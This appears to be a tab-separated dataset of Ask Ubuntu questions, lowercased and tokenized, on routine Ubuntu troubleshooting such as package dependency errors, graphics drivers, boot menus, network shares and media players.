261435	ubuntu desktop is not loading	i have researched my problem on google ; but , i can not find a fix and i do not know why my desktop is not showing . only the background wallpaper shows up . i also tried ctrl-shift-f1 and removed compiz compiz-core then the same thing , and i also tried reinstalling ubuntu-desktop but again the same thing ! does someone know how to fix this ? i do n't want to reformat my ubuntu drive . fixed : apt-get upgrade
261437	how to install a virgo ftp on ubuntu 12.10 on session fallback desktop	i am using ubuntu 12.10 with session fallback desktop and really very much confused about how to install a software on ubuntu . please clarify few issue . i want to install virgoftp . i download it from http : //sourceforge.net/projects/qftp/ . it is .zip file . i extract it on /download folder as it is.. but there no clear information how to use this ? here is running section from readme.txt file of virgoftp folder running : 1 . extract this .zip file . 2 . change to the 'virgoftp ' directory where the files were extracted . 3 . change the script be executable using `` chmod u+x virgoftp '' 3 . start virgoftp by running the script named 'virgoftp ' using `` ./virgoftp '' so please tell me in which folder i have to paste its respective folders . in /user/lib or /opt or /var/lib/ . how to make an desktop shortcut for virgo ftp ? how to run virgoftp ?
261438	is there a pdf reader with regular expression search	when i want to search a snipet , like searchpart1 some unknown text searchpart2 in a text file , i use searchpart1.*searchpart2 . but this is not possible in any pdf reader i use . currently i convert pdf to a text file and open it using less or geany , then use regular expression available on it . is there a pdf reader with regular expression search other than the commandline pdfgrep
261443	old ubuntu 10.10	explanation : i have a vps that comes with ubuntu 10.10 . i 'm using it for a webserver that runs a bunch of sites . my problem is that i can not upgrade the distribution ( which i really want ) . i installed the needed software but at some point it start giving me problems . i think it is important to say that i changed to source.list from maverick to natty . so basicly i just copy the source list of natty and put it into the place of maverick . then i was able to install apache , php and etc . now when i try to install something it always gives me this error : reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... failed . the following packages have unmet dependencies : cpp-4.4 : depends : libc6 ( > = 2.14 ) but 2.13-0ubuntu13.2 is installed g++-4.5 : depends : gcc-4.5 ( = 4.5.2-8ubuntu4 ) but 4.5.3-12ubuntu2 is installed gcc-4.5 : depends : gcc-4.5-base ( = 4.5.3-12ubuntu2 ) but 4.5.2-8ubuntu4 is installed depends : cpp-4.5 ( = 4.5.3-12ubuntu2 ) but 4.5.2-8ubuntu4 is installed depends : libgcc1 ( > = 1:4.5.3-12ubuntu2 ) but 1:4.5.2-8ubuntu4 is installed depends : libc6 ( > = 2.14 ) but 2.13-0ubuntu13.2 is installed libc6 : depends : libc-bin ( = 2.13-0ubuntu13.2 ) but 2.15-0ubuntu10.3 is installed libgomp1 : depends : libc6 ( > = 2.14 ) but 2.13-0ubuntu13.2 is installed libmpfr4 : depends : libc6 ( > = 2.14 ) but 2.13-0ubuntu13.2 is installed libnih-dbus1 : depends : libnih1 ( = 1.0.3-4ubuntu9.1 ) but 1.0.3-1ubuntu1 is installed e : error , pkgproblemresolver : :resolve generated breaks , this may be caused by held packages . e : unable to correct dependencies root @ 348588 : /var/cache/apt/archives # apt-get -u dist-upgrade reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : cpp-4.4 : depends : libc6 ( > = 2.14 ) but 2.13-0ubuntu13.2 is installed g++-4.5 : depends : gcc-4.5 ( = 4.5.2-8ubuntu4 ) but 4.5.3-12ubuntu2 is installed gcc-4.5 : depends : gcc-4.5-base ( = 4.5.3-12ubuntu2 ) but 4.5.2-8ubuntu4 is installed depends : cpp-4.5 ( = 4.5.3-12ubuntu2 ) but 4.5.2-8ubuntu4 is installed depends : libgcc1 ( > = 1:4.5.3-12ubuntu2 ) but 1:4.5.2-8ubuntu4 is installed depends : libc6 ( > = 2.14 ) but 2.13-0ubuntu13.2 is installed libc6 : depends : libc-bin ( = 2.13-0ubuntu13.2 ) but 2.15-0ubuntu10.3 is installed libgomp1 : depends : libc6 ( > = 2.14 ) but 2.13-0ubuntu13.2 is installed libmpfr4 : depends : libc6 ( > = 2.14 ) but 2.13-0ubuntu13.2 is installed libnih-dbus1 : depends : libnih1 ( = 1.0.3-4ubuntu9.1 ) but 1.0.3-1ubuntu1 is installed e : unmet dependencies . try using -f. it is dependency problem . i read a bunch of articles from this website but none of them help me . does anyone have a solution for the problem ? thanks
261446	ubuntu 10.10 for apc 8750	i am using acp 8750 running on armv6 , which runs on android 2.3 and optional boot from sd card to raspbian os . my question is can you build custom ubuntu 10.10 that i can boot using my apc 8750 ?
261447	will ubuntu 12.10 64bit recognize 6gb ram on 2007 macbook pro	i have a 2007 macbook pro running 12.10 64bit . i have read that it would support 6gb of ram even though apple only recommended 4gb at the time . i was wondering if ubuntu would recognize it as well .
261449	how to make caps lock change keyboard layout without delay ?	i use caps lock to change keyboard layout since the first year with linux . now , somewhere in the last year some patch added something so now it waits for ~300ms before changing the layout . and if i hit any key before that time ends it does n't work . afaiu it 's somehow related to using meta/win both as modifier and as key . is that interval tweakable ? i do n't use it as a modifier at all .
261450	manual intervention required for booting - how do i automate this ?	i have ubuntu 12.04 running exclusively on my aspire one 756 netbook , i downloaded the 64bit iso and made my install on a usb-stick . first issue : it did not boot automatically from that stick , i had to choose the usb efi device manually to boot and install from . however the installation went fine now the system wo n't boot normally and i always need to choose the efi part manually to boot . the bios ( updated yesterday to v1.09 ) and has no 'legacy boot ' nor a 'secure boot ' option to choose from . the grub update with `` boot=efi '' made no changes . is there a solution to automate this ? thanks in advance update : i 've run boot-repair over it . maybe it helps boot-repair info
261451	rtcwake from acpi state s5	i 've used rtcwake on my desktop for some time running precise pangolin without problems . recently i came across a thinkpad x230 with an ultradock which i also installed precise pangolin on . it works great and for a while rtcwake seemed to work as well . i noticed that it only seemed to support `` off-mode '' when attached to the dock though . now it no longer seems to support `` off-mode '' and that 's my problem . it does n't wake up no more . i 've tried `` mem '' and that works , but i really would like `` off '' to work as well . anyone got any ideas ?
261460	no mouse after fresh install	i installed 12.04 64-bit on a 120gb ssd . i reboot after the install ( no errors so far ) and the mouse is not working . i tried depmod but this throws an error : /lib/modules/*****_generic is missing etc ... putting the normal hdd back to my laptop everthing works fine .
261464	ways to run nautilus with elevated privileges	what are the differences between the following ways to run nautilus with elevated privileges : a ) sudo nautilus b ) gksu nautilus c ) gksudo nautilus which should i use ?
261468	where is the documentation for programming opengl es for ubuntu touch ?	how can i program an opengl es program for ubuntu touch ? i have installed qtcreator and the ubuntu sdk , but i ca n't seem to find any documentation about this topic .
261484	how can i connect to all drives automatically when i log in ?	the download folder in my google chrome is a folder in another drive ( partition ) . but when i log in , the folder can not be opened through chrome unless i open the drive manually ( with nautilus or dolphin ) . there 's a similar problem with remmina . how can i connect to all drives automatically when i log in ?
261489	how do i dynamically add tab to tabs ?	i am trying to add a new tab to the tabs component with the code below . when running there is no error reported but no additional tabs are show . i have tried using both tabs and tabs.__tabsmodel as the parent but no additional tabs are show . import qtquick 2.0 import qtquick.localstorage 2.0 import ubuntu.components 0.1 mainview { // objectname for functional testing purposes ( autopilot-qt5 ) id : mainview objectname : `` mainview '' applicationname : `` news-feed '' width : units.gu ( 100 ) height : units.gu ( 75 ) tabs { id : tabs anchors.fill : parent component.oncompleted : { mainview.initializedb ( ) ; mainview.savefeed ( `` bbc news '' , '' http : //feeds.bbci.co.uk/news/rss.xml '' ) ; mainview.savefeed ( `` jono bacon '' , '' http : //www.jonobacon.org/ ? feed=rss2 '' ) ; mainview.savefeed ( `` the register '' , `` http : //www.theregister.co.uk/headlines.atom '' ) ; filltabs ( ) ; } tools : toolbaractions { action { objectname : `` action '' iconsource : qt.resolvedurl ( `` avatar.png '' ) text : i18n.tr ( `` tap me ! '' ) ontriggered : { label.text = i18n.tr ( `` toolbar tapped '' ) } } } // first tab begins here tab { id : tabfrontpage objectname : `` tabfrontpage '' title : i18n.tr ( `` front page '' ) // tab content begins here page : page { column { anchors.centerin : parent label { id : labelfrontpage text : i18n.tr ( `` this will be the front page \n an aggregation of the top stories from each feed '' ) } } } } } function filltabs ( ) { var db = getdatabase ( ) ; db.transaction ( function ( tx ) { var rs = tx.executesql ( 'select * from feeds ; ' ) ; if ( rs.rows.length > 0 ) { for ( var i = 0 ; i < rs.rows.length ; i++ ) { var feedtab = qt.createqmlobject ( 'import qtquick 2.0 ; import ubuntu.components 0.1 ; tab { anchors.fill : parent ; objectname : `` tab '' ; title : i18n.tr ( `` tab '' ) ; page : page { anchors.margins : units.gu ( 2 ) ; column { anchors.centerin : parent ; label { id : label ; objectname : `` label '' ; text : i18n.tr ( `` tab '' ) ; } } } } ' , tabs , '' feedtab '' ) ; } } else { res = `` unknown '' ; } } ) } //storage api function getdatabase ( ) { return localstorage.opendatabasesync ( `` news-feed '' , '' 1.0 '' , '' storagedatabase '' ,10000 ) } //initialise db tables if not already existing function initializedb ( ) { var db = getdatabase ( ) ; db.transaction ( function ( tx ) { //create settings table if not existing tx.executesql ( 'create table if not exists settings ( setting text unique , value text ) ' ) ; tx.executesql ( 'create table if not exists feeds ( feedname text unique , feedurl text unique ) ' ) } ) ; } //write setting to db function setsetting ( setting , value ) { //setting : string - setting name ( key ) //value : string - value var db = getdatabase ( ) ; var res = `` '' ; db.transaction ( function ( tx ) { var rs = tx.executesql ( 'insert or replace into settings values ( ? , ? ) ; ' , [ setting , value ] ) ; //console.log ( rs.rowsaffected ) if ( rs.rowsaffected > 0 ) { res = `` ok '' ; } else { res = `` error '' ; } } ) return res ; } //read setting from db function getsetting ( setting ) { var db = getdatabase ( ) ; var res= '' '' ; db.transaction ( function ( tx ) { var rs = tx.executesql ( 'select value from settings where setting= ? ; ' , [ setting ] ) ; if ( rs.rows.length > 0 ) { res = rs.rows.item ( 0 ) .value ; } else { res = `` unknown '' ; } } ) return res ; } function savefeed ( feedname , feedurl ) { var db = getdatabase ( ) ; var res = `` '' ; db.transaction ( function ( tx ) { var rs = tx.executesql ( 'insert or replace into feeds values ( ? , ? ) ' , [ feedname , feedurl ] ) ; //console.log ( rs.rowsaffected ) if ( rs.rowsaffected > 0 ) { res = `` ok '' ; } else { res = `` error '' ; } } ) return res ; } //return a single feed function getfeed ( feedname ) { var db = getdatabase ( ) ; var res = `` '' ; db.transaction ( function ( tx ) { var rs = tx.executesql ( 'select feedurl from feeds where feedname= ? ; ' , [ feedname ] ) ; if ( rs.rows.length > 0 ) { res = rs.rows.item ( 0 ) .feedurl ; } else { res = `` unknown '' ; } } ) return res ; } //return all feeds and urls function getfeeds ( ) { var db = getdatabase ( ) ; var res = `` '' ; db.transaction ( function ( tx ) { var rs = tx.executesql ( 'select * from feeds ; ' ) ; if ( rs.rows.length > 0 ) { return rs ; } else { res = `` unknown '' ; } } ) return res ; } }
261493	how to enable multiviews in ubuntu 12.10	https : //help.ubuntu.com/12.10/serverguide/httpd.html it said that : multiview - support content-negotiated multiviews ; this option is disabled by default for security reasons . how to enable it ?
261495	how to bulk-extract objects from swf ( adobe flash ) files with swfextract ?	swftools are a uniq set of tools but lack some user friendliness . they even ca n't iterate over provided objects to work with : only one file allowed . you supplied at least two . $ swfextract file.swf -i 1,2 warning ! you should use the -p when extracting multiple objects $ ls file.swf output.swf $ swfextract file.swf -i 1,2 -p $ ls file.swf output.swf
261499	how do i check the version of the selenium api installed ?	i want to check the version of selenium api i am using . i tried googling it , but could n't find out .
261508	access windows pc over network from command line	i am trying to access a windows pc on my network from ubuntu using the command line . my goal is to retrieve a few files from that windows box . i do n't have access to the ubuntu gui , all i can use is the command line i do n't have physical access to the windows box the username i have for the windows box has administrator rights i have tried to use those 2 smbclient commands but both gave the same error : smbclient //192.168.1.64/c $ smbclient //192.168.1.64/c $ -u windowsusername connection to //192.168.1.64/c $ failed ( error nt_status_connection_refused ) i also tried to use this answer , but got an error too : mount -t smbfs //192.168.1.64/c $ /mnt/windows-pc -o user=windowsusername mount : mount point /mnt/windows-pc does not exist
261509	how do i get the option ( during login ) to select unity back ?	when i turn my computer on a screen comes up asking me for a password . this is not the typical ubuntu log in screen , but it looks like the gnome log in . usually this gives me a choice of what to log in to : unity , gnome , gnome no effects , etc . this time around i have no choice , it just takes me into the current version of gnome ( do n't know to call this the shell or gnome 3 ) . everything works fine , but the normal unity session is missing , as are the other gnome options . how do i get the option to select unity back ?
261513	is it possible to set totem as frontend for xine ?	the wikipedia article for totem player says that `` until version 2.27.1 , it could alternatively be configured to use the xine libraries instead of gstreamer '' . i like xine very much , but not its available guis ( xine-ui , gxine , kaffeine are so awkward that i still prefer to stick with vlc , smplayer , totem or gnome player ) . is it a way to make one of the most used `` players '' - especially totem , maybe , but the present version 3.4 might not allow it - be used as a fronted for the xine engine ( xine-lib ) ? ( also , is there a new gui for xine that i have not mentioned ? the others listed here are abandoned . )
261516	how to synchronize tomboy notes	since ubuntu one tomboy sync is shutting down , what service i could use to synchronize my tomboy notes between my android , windows , and ubuntu boxes ? without proper syncing , i have no incentive to keep using it .
261517	how to find and download a image file of specific resolution using wget ?	how can i find and download an image file of specific resolution e.g . : 100x99 whose file name is not known using wget ? thanks in advance .
261525	is there any way to add kde widgets in unity environment ?	i need a kde plasma desktop widget ( for typing quick short notes ) . but i use unity environment . is there any way to add kde widgets in unity environment ? or is there any widget or widget manager for ubuntu ( unity ) desktop ?
261529	what are the advantages and disadvantages of using wicd ?	i 've been wondering on what are the advantages and disadvantages of wicd can somebody please tell me ?
261530	how do i save a juju service for later ?	when i 'm finished using a juju service for a period of time , how do i put it away so that i can bring it up in the same state ? or , are juju services meant to be stateless ?
261532	on what ( main ) `` engines '' are based ubuntu video players ?	thinking about using xine , beside other players like vlc and the mplayer-based ones , i became interested in this and tried to understand this kind of terminology ( player , frontend , gui , engine , etc ) , as they are used for example in the xine-ui help : for example , a question might be `` is totem a gui/frontend of gstreamer ? `` ; but i do not want necessarily an answer to a such question here : but in order to create separate questions like `` what video players are based on the x engine ? '' i need to know which are the main engines used by ubuntu video players .
261534	lightdm-gtk-greeter-ubuntu `` crashes '' after installing kde4.10	i have a weird problem , which i did n't found anything on the internet about . i installed kde4.10 ( from kubuntu-ppa/backports ) a week ago , and it changed the loginscreen . after there was something weird with my sound ( does n't matter anymore ) i uninstalled kubuntu-desktop , rebooted and then i just got mountall : connection to plymouth disconnected . after installing kubuntu-desktop again . the problem was gone , but i had again this kde-like loginscreen . later i figured out , that i can change the greeter in /etc/lightdm/lightdm.conf from greeter-session=lightdm-kde-greeter to greeter-session=lightdm-gtk-greeter-ubuntu but this brings back the old problem which can be seen in the picture i linked above . does anyone know how i can fix this ? i would like to have the standard-loginscreen again .
261535	slower wifi after update to kernel 3.8	i updated my ubuntu 12.10 ( kernel 3.7.9 ) to kernel 3.8 and noticed that my wifi connection from 150mbps went to 72.2 mbps . can someone help me to solve it ?
261539	can i dual boot a nexus 4 with touch preview ?	can i dual boot a nexus 4 with touch preview ? i have installed ubuntu touch preview on my phone , but i can not use it as primary device . i still like to have it for development and testing . any guidance would be helpful .
261551	warning while running libreoffice4.0	i installed libreoffice4.0 according to this . while running i get following warning . fontconfig warning : `` /opt/libreoffice4.0/share/fonts/truetype/fc_local.conf '' , line 13 : having multiple < family > in < alias > is n't supported and may not works as expected is the warning critical ? what is the problem here ? how can i do to solve the problem ?
261553	how to avoid the change of timestamp of files when moving then from directory	when i move files from one directory to another , the timestamp of the files changes . for example , if the file was created with a date 2013-01-01 , when i move it to a different directory , the final file will have the date of the move , not of the creation . how to fix this ?
261554	writing iso to usb	i downloaded the iso for ubuntu-12.04.2-server , the pc i 'm installing this on does not have a cd or dvd drive . i 'd like to write this to a flash drive , all the utilities i would normally use are only good for windows , how can i do this for ubuntu ?
261555	is there a problem if i install steam for linux and steam via playonlinux ?	i 've been enjoying playing in ubuntu 12.10 using steam for linux . the thing is some games ( like borderlands2 ) ca n't be installed there because you can only install games for linux . previously i used steam ( for windows ) installing it with playonlinux in ubuntu 12.10 . is there a problem if a install them both at once ?
261556	allow user and program to use a directory ( read/write ) outside /home	there is currently an issue with mendeley in ubuntu and ecryptfs home folders the only workaround at this time is to allow mendeley to write/read to another folder outside the ecrypted /home folder . how can i make a folder under / readable and writable to the program and user in question ?
261559	keyboard repeat/delay is reset when plugging in usb keyboard in ubuntu 12.10 xfce	every time i plug in an external keyboard to my laptop the keyboard repeat and delay are set to the slow default . my current workaround is to open the keyboard settings dialog and slightly move the delay slider . this is annoying and happens to me every day so i 'd like a better/faster solution . this bug report from karmic is exactly what 's happening to me , but i 'm running xfce4 on 12.10 and not gnome on karmic . is there a script i could write to reload the xfce4 settings anytime a usb keyboard is plugged in ? ( udev rule ? ) any help in solving this problem is appreciated .
261561	qt for ubuntu sdk : do i need a device or is there a simulator ?	just wondering if the ubuntu sdk comes with a simulator like eclipse for android or if i need to flash an actual device ? thanks .
261562	how can i multiboot windows xp , ubuntu 12.04 , windows 7 and pardus 2011 ?	is it possible to install windows xp with ubuntu 12.04 on master drive . and windows 7 with pardus 2011 on slave drive ? if so , can you provide instructions on how to go about doing so ? i had to wipe both my drives because the mbr got screwed up somehow . i tried fixing , but no luck .
261564	unity dash terribly slow	unity dash is very slow for me , and completely useless . it needs more then 5 seconds to open , and after that i cant type smoothly . it used to work better before , but probably broke with some updates . i disabled dash blur , but it is still slow . i run ubuntu 12.10 on asus x401 . $ lspci 00:00.0 host bridge : intel corporation 2nd generation core processor family dram controller ( rev 09 ) 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 00:14.0 usb controller : intel corporation 7 series/c210 series chipset family usb xhci host controller ( rev 04 ) 00:16.0 communication controller : intel corporation 7 series/c210 series chipset family mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation 7 series/c210 series chipset family high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 1 ( rev c4 ) 00:1c.1 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 2 ( rev c4 ) 00:1c.3 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 4 ( rev c4 ) 00:1d.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation 7 series chipset family lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation 7 series chipset family 6-port sata controller [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation 7 series/c210 series chipset family smbus controller ( rev 04 ) 02:00.0 network controller : atheros communications inc. ar9485 wireless network adapter ( rev 01 ) 03:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. device 5289 ( rev 01 ) 03:00.2 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 0a )
261566	wiki.ubuntu.com forcing https with improper security certificate	site : https : //wiki.ubuntu.com when you attempt to go to the http wiki site , the http server sends a `` moved permanently '' response forcing the browser to use https/ssl , but the certificate being provided by the https is not correct . the certificate has the following properties : cn : *.canonical.com san : *.canonical.com , canonical.com both of these are invalid because the domain name of the site is wiki.ubuntu.com i have not visited this site for a while , but today i was trying to reach a page about ipv6 . questions : ( 1 ) is this change recent ? ( 2 ) is this certificate expected ?
261570	no hdmi output with ati 5470	my laptop is hp 3030ej with ati 5470 and switchable graphics . for some reason ubuntu 12.10 ( 64 bit , if that matters ) does n't recognize the hdmi output for my monitor . i tried following several tutorials for installing either the propitiatory drivers through amd 's site , or just enabling the proprietary drivers through software sources . nothing seems to work , i either end up with no unity , or with low graphics mode . does anyone have any idea what to do next ?
261573	running a web test server with ubuntu	i have typically used xampp on my windows pc for web development testing . this afternoon i plan to add lamp to my ubuntu . i would also like to try and install apache tomcat but i am not familiar if can this be done in ubuntu 12.04 ? is there any solid documentation for testing and running ? i did not find anything from my searches here so if this has been asked please close . also , if you can suggest a better tutorial for the lamp install i would greatly appreciate it . this will be for local testing , too .
261574	cursor trapped on secondary x screen	problem my mouse keeps getting stuck on display=:0.1 . setup three monitors on two cards with two x screens . radeon hd 6950 ( 00 ) display=:0.0 monitor 1 over hdmi monitor 2 over dvi radeon hd 6950 ( 01 ) display=:0.1 monitor 3 ( named 7 by aticonfig ) over dvi xorg.conf explanation previously on 12.10/12.04 , i have been able to get a similar setup working by invoking aticonfig -- init=dual-head and then aticonfig -- set-pcs-val=mcil , digitalhdtvdefaultunderscan,0 ( the latter makes sure my displays have no black boundaries/no underscan ) . while i am aware of bugs in nautilus/compiz that make a second x screen buggy and messy , i have never had my cursor get trapped on it .
261576	creating scripts	i 'm following advice from lesswatts to lower battery drain with the following commands : mount -o remount , noatime / hdparm -b 1 -s 12 /dev/sda echo 3000 > /proc/sys/vm/dirty_writeback_centisecs iwconfig wlan0 power on echo 10 > /sys/module/snd_hda_intel/parameters/power_save the question is , how do i set them up to start automatically with system start ?
261580	alternatives to or workaround for snd-usb-audio ?	so i have an hp envy 3040-nr ( http : //www.amazon.com/hp-15-3040nr-laptop-black-silver/dp/b006pcdji2 ) , and after problems with usb-audio and searching around i ended having to blacklist snd-usd-audio in my /etc/modprobe.d/alsa-base.conf . this fixes a lot of problems with freezing , slight hangs on startup , no sound . i recently tried un-blacklisting it and the problems returned , so that is not an option . however , i am trying to get a midi-keyboard to work with ubuntu , and i realized that when i unblacklist snd-usb-audio it picks it up properly , but with it blacklisted the computer is unable to read it . does anyone have any ideas on an alternative driver i could use for usb audio ? or perhaps a workaround for this very specific situation ? any guidance appreciated , thanks !
261581	how to enable `` text selection '' at startup in okular ?	in kde 's pdf reader `` okular '' , at startup , text selection is set to `` draw a rectangle around the text/graphics to copy '' . i 'd like to have it set as `` text selection '' by default . how to do this ?
261582	installing with wubi - can not edit bcd error	everything download and installs and right before the installation is finished i get an error and it says something about bcd , i think wubi can not set the bootsectors properly but why is that ? i tried so many times ... i just want to be able to choose between win7 and ubuntu when booting my pc the error : error executing command command=c : \windows\system32\bcdedit.exe /set { 45b546de-fc69-11e1-82db-c95eae63f03e } device partition=u : retval=1 stderr=an error has occurred setting the element data . the request is not supported . stdout=
261588	how to resize table heights in libreoffice writer ?	i 'm trying to edit a table in libreoffice writer so that the rows are each their own designated and precise height . i 've managed that for the columns by going to table > table properties ... then selecting the columns tab ( as pictured below ) but i can not find a similar option for rows . is there a way of editing row height without dragging the borders ( which makes the result invariably imprecise ) ? thank you , -- calixte
261593	error updating system	hello : ) i am new to ubuntu . and i am getting this error : a red triangle in the taskbar ( i was not allowed to post a pic ) i just used shutter for the first time ! great app ! ! with this message : w : failed to fetch http : //ppa.launchpad.net/gm-notify-maintainers/ppa/ubuntu/dists/precise/main/source/sources 404 not found , w : failed to fetch http : //ppa.launchpad.net/gm-notify-maintainers/ppa/ubuntu/dists/precise/main/binary-amd64/packages 404 not found , w : failed to fetch http : //ppa.launchpad.net /gm-notify-maintainers/ppa/ubuntu/dists/precise/main/binary-i386/packages 404 not found , e : some index files failed to download . they have been ignored , or old ones used instead . it looks serious ... .what do i do ?
261595	need external ( usb ) sound card suggestions that work with ubuntu 12.04	i do n't know if this is the right place to ask about this , but i 'll give it a try . i 'm a linux user for a while now and i try to avoid opening windows as much as possible . but for some things , i just have to . one of those things is recording . i play the guitar and i write music so i often need to record what i 'm playing . just in case it matters i 'm planning to use ardour audacity rosegarden hydrogen and most of those nice programs that are widely known ( linux known hehe ) . i need external usb sound card suggestions so i can do my thing on linux as well . not too expensive please .
261598	can anyone tell me how to make an image of a disc in ubuntu that later i can mount and use ?	i am trying to find an application that makes iso or whatever usable type of images of a disc . i 'd like something that is not command-based but has a nice graphical interface .
261600	the following packages have unmet dependencies	the following packages have unmet dependencies : apache2 : depends : apache2-mpm-worker ( = 2.2.22-1ubuntu1 ) but 2.2.22-1ubuntu1.2 is to be installed or apache2-mpm-prefork ( = 2.2.22-1ubuntu1 ) but it is not going to be installed or apache2-mpm-event ( = 2.2.22-1ubuntu1 ) but it is not going to be installed or apache2-mpm-itk ( = 2.2.22-1ubuntu1 ) but it is not going to be installed depends : apache2.2-common ( = 2.2.22-1ubuntu1 ) but 2.2.22-1ubuntu1.2 is to be installed e : unable to correct problems , you have held broken packages . having trouble reinstalling apache .
261601	how can i search available ppa packages and get a list sorted by version number ?	it is possible to search through the available ppas on this web page , but is there any way to perform this search and get a list of ppas sorted according to the version number and/or date of the most recent matching package ?
261602	unusually high cpu % and bad performance on both ubuntu and xubuntu	i recently decided to switch to ubuntu from windows 7 , and i 've been having some problems regarding cpu usage . any program i have running uses 40-50 % of my cpu , which is way too much obviously . i 'm running teamspeak 3 , terminal , and firefox as we speak , and ts3 's cpu % is around 45 % steady , something called `` xorg '' is always between 20 % and 50 % , changing a lot , and firefox is switching between as little as 2 % up to as high as 40 % . sometimes a process even goes up to 150 % cpu . i 'm using xubuntu 12.10 now , but i 've had the same problem when i used ubuntu 12.10 . i ca n't watch video properly , it 's always lagging , and it 's taking a long time to switch tabs in firefox . i 've been searching for the source of this problem for a long time but i could n't find it , that 's why i 'm asking my question here . my laptop specs are : asus a52j intel i3 processor 4gb ram amd ati mobility radeon hd 4500/5100 series
261611	hybrid graphics driver not working ( 12.04 )	after two days of intensive research and two ubuntu 12.04 and 12.10 installations later i 've reached a dead end . i currently own a hp dv6-3315ep laptop , which comes with a 6550m graphics card , and the intel graphics card for lower power consumption ( switch-able graphics ) . i 've read everywhere how to install the amd drivers manually , which i 've done in all different ways , including different versions due to the how-to posts being dated and new driver versions being available , and also tried installing the drivers to the additional drivers directly from ubuntu , with that being said i 've either ended in low graphics ( after running aticonfig -- initial -f ) mode or using the default drivers from the clean install ( because not forcing aticonfig -- inital would come out as not detecting anything related to any usable amd hardware ) . before installing fglrx , i 've lspci | grep vga and what i 've got from it was 00:02.0 vga compatible controller : intel corporation core processor integrated graphics controller ( rev 02 ) 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati madison [ radeon hd 5000m series ] what made me realize that it would seem like it was not detecting my graphics card correctly , but i did n't mind it . so , i wish to know if there is any reliable method that i could use to correctly install amd proprietary drivers on my computer , or only install the intel graphics driver so it would allow me to use the hdmi and vga ports on my computer . thank you for reading .
261613	ubuntu 12.10 - really slow performance	i 'm very new to linux/ubuntu - just installed it on my pc today for the first time ever . it seemed like a great alternative to windows 8 which annoys me . unfortunately , even though the installation was successful , i 'm facing really awful performance issues on my pc . pc specs : amd phenom x4 920 3.0ghz black edition nvidia geforce gtx260 896mb 4gb ram wd caviar green 750gb windows 8 64-bit runs very smoothly on my pc . unfortunately , ubuntu works as if it was running on a 20 yo personal computer . the lag is incredible , windows turn from active to inactive and back to active again all the time , my graphics card gets really hot . before you ask , i do have graphics card drivers installed and i 've also tried installing preload and change swappiness values using terminal but when it asked for my password i could n't write it down - it seemed as if my keyboard got disabled when it came to terminal . so far ubuntu on my pc is unusable so i would really appreciate help . thanks so much for any advice .
261626	configuration of iptables ( verfication , actives services , allow ftp )	iâm experimenting with ipt 's ( iptables ) in xubuntu . first experimentation wato allow all output traffic and block all input except already existing tcp connections can somebody verify if these are correct to go a bit more advanced i 'm trying to allow als tcp connections to active services on my workstation . my idea is to do a nmap scan and grep the listening/open ports but i 'm probably over thinking it . finally i 'm trying to allow ftp . i used this additional rule to allow ftp but it seems i still get blocked sudo iptables -a input -p tcp -- dport 21 -m state -- state new , established -j accept
261629	what is the recommended stable way to update ubuntu ?	i asked this question for the simple fact that software center was trying to forced 9 software updates that came from a non too familiar source which i believe has been causing ubuntu to be unstable . i found out that most of the software/packages that were being forced to update manager as updates are software that i do not have on my machine . i made a mistake of installing software/packages before that were pushed through software center and have lived to regret it . i have to admit that i 'm not too familiar with this particular source ; how can i prevent this from happening in the future ?
261632	ubuntu 12.04 fresh install comes with xorg 1.13	i have an ati-radeon hd4500 and because amd doesn´t yet support the new xorg version 1.13 for the catalyst-legacy driver i decided to make a clean install of ubuntu 12.04 which i thought should come with xorg 1.12 ! but surprisingly after installation xorg -version tells me that i have 1.13 installed ... does anybody has an idea how this is possible ? and what should i do now , i need the amd-driver because my laptop gets insanely hot with the opensource driver ... unfortunately this link doesn´t help in my case , apt-get keeps telling me [ unable to locate package fglrx-legacy ] hopefully somebody can help me solve this , i can´t really use my laptop without the driver ... thanks in advance
261633	kde app theming using sudo in unity	when i run kontact as another user using gksudo , gksu , or kdesudo , the theming is all messed up : when i run thunderbird as another user , it works fine ! i 'm running ubuntu 12.10 using the unity interface . how can i fix the theming of kde apps when run as a different user ?
261636	how do i backport/install a newer version of clang ?	i just want to install the newest version of clang http : //packages.ubuntu.com/raring/clang-3.2 does this mean i have to update my kernel to raring ?
261637	how to make the context menu dark in all programs in 12.10 ?	when i right click on the desktop or nautilus , the context menu is dark . when i right click everywhere else , it 's light . how to make it dark in all programs ? is there an ambiance-based theme i can install ?
261643	dns address for all future connections ubuntu 12.10	i 'm using ubuntu 12.10 and usually use opendns or dyndns for each of my network connections . however it can be a inconvenient having to set the dns address for each connection individually ... is there some way to force one dns address for all connections , including future connections ? i 've googled around but have n't been able to find a good working solution . : /
261644	ubuntu has been removed but still shows up in boot menu	i installed ubuntu as a dual-boot with my windows 7 pc and then later removed ubuntu ( by deleting the partition and also by clicking 'uninstall ubuntu ' in the windows 7 control panel ) . however when the pc boots up , it gives the option for ubuntu , even though it should be removed . i want my pc to be a single windows 7 boot again with no trace of ubuntu and that automatically boots up to windows 7 and would greatly appreciated someone who knows what they 're doing 's help with this please . thank you in advance , david
261645	how to stop rhythmbox adding played sound files to the library ?	everytime i play an audio files with rhythmbox the program adds it to the library automatically . also when the file stops playing rhythmbox plays the next file of the library list . how can i stop this behaviour ? i 'm using ubuntu 12.04 if this helps .
261648	rhythmbox tray icon	i do n't know why , but rhythmbox does not show up in tray . i have installed and activated an additional plugin from this site and added 'all ' to whitelist ( dconf-editor - > com - > canonical - > desktop - > panel ) , rebooted the computer , but there 's still nothing .
